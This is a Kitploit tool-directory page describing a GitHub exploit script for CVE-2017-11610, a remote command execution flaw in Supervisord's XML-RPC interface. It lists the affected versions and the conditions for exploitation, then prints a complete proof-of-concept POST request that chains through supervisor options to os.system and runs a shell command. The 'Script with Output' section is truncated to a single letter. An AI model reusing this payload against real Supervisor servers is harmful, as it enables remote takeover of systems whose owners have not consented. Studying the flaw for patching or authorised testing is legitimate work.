Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2017-11610 — Supervisord远程命令执行漏洞脚本 | Kitploit
Tools/GitHubGitHub/yaunsky/cve-2017-11610
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubyaunsky/cve-2017-11610

CVE-2017-11610

Supervisord远程命令执行漏洞脚本

View Repository
4275 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Supervisord Remote Command Execution Vulnerability Script (CVE-2017-11610)

Vulnerability Overview

Supervisor is a process management tool written in Python, which can be used to start, restart (auto-restart programs), and stop processes (not just Python processes) on UNIX-like systems (Windows is not supported).

Supervisor is a C/S model program, where supervisord is the server side and supervisorctl is the client side. Simply put, the client inputs supervisor commands to call the API on the server side to perform certain tasks.

The Web service of Supervisor, which is actually the client of supervisord, is often used by many people. As long as the route is reachable, you can remotely perform operations similar to the supervisor client through the Web page. Operations through the Web interface are implemented via the XML-RPC interface, and this vulnerability also arises from the way the XML-RPC interface handles data.

Exploitation Conditions

  • Supervisor version 3.1.2 to Supervisor version 3.3.2
  • Web service enabled and port 9001 accessible
  • Weak password or empty password

POC

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

This POC has no output.

Script with Output

a

Download Tool